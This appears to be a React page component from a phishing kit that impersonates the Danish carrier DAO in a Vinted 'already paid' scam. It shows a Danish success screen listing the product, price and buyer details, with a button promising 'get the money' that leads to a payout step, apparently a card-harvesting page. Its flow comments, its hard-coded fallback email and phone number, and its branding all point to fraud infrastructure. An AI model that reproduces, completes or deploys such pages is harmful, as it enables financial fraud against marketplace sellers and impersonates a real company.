import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DaoDkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const DAO_HEADER_IMG = `${process.env.PUBLIC_URL || ''}/dk-dao/header.png`;

function DaoIcon() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 2l9 5v10l-9 5-9-5V7l9-5zm0 2.2L5 8v8l7 3.8 7-3.8V8l-7-3.8z"
      />
    </svg>
  );
}

/**
 * dao (DK) — success: rød header + stepper + kort + CTA → index2 (VintedStripe2).
 * Flow: VintedStripe1 (captcha) → success → index2.
 */
function DaoDkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'DK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'DKK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const receiver = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const email = (pageData?.email || '').trim() || 'kommentarsina@gmail.com';
  const phone = (pageData?.middle_name || '').trim() || '+45 58356875';
  const servicePoint = (pageData?.site_name || '').trim() || 'daoHOME';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="daodk-wrap">
        <div className="daodk-loading">Indlæser…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="daodk-wrap">
      <img className="daodk-header-img" src={DAO_HEADER_IMG} alt="" />

      <div className="daodk-steps">
        <div className="daodk-stepper" aria-hidden>
          <div className="daodk-step daodk-step--done">
            <span className="daodk-step-dot">1</span>
            <span>Produkt</span>
          </div>
          <div className="daodk-step daodk-step--done">
            <span className="daodk-step-dot">2</span>
            <span>Adresse</span>
          </div>
          <div className="daodk-step daodk-step--active">
            <span className="daodk-step-dot">3</span>
            <span>Betalt</span>
          </div>
          <div className="daodk-step">
            <span className="daodk-step-dot">4</span>
            <span>Modtag</span>
          </div>
        </div>
      </div>

      <main className="daodk-main">
        <div className="daodk-card">
          <div className="daodk-card-head">
            <div className="daodk-card-icon" aria-hidden>
              <DaoIcon />
            </div>
            <h2 className="daodk-card-title">Produkt allerede betalt for</h2>
          </div>
          <div className="daodk-card-body">
            <div className="daodk-cols">
              <div className="daodk-col">
                <h4>Oplysninger om køb</h4>
                <p>Produkt: {productName}</p>
                <p>Pris: {amountLine}</p>
              </div>
              <div className="daodk-col">
                <h4>Pakken sendes til</h4>
                <p>Navn: {receiver}</p>
                <p>Adresse: {address}</p>
                <p>{email}</p>
                <p>{phone}</p>
              </div>
              <div className="daodk-col">
                <h4>Pakke</h4>
                <p>{servicePoint}</p>
                <p>1 - 200 kg</p>
              </div>
            </div>
          </div>
        </div>

        <div className="daodk-amount">{amountLine}.</div>

        <Link className="daodk-cta" to={index2Path}>
          Få pengene: {amountLine}.
          <span className="daodk-cta-sub" aria-hidden>
            Fortsæt til udbetaling
          </span>
        </Link>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DaoDkSuccess;

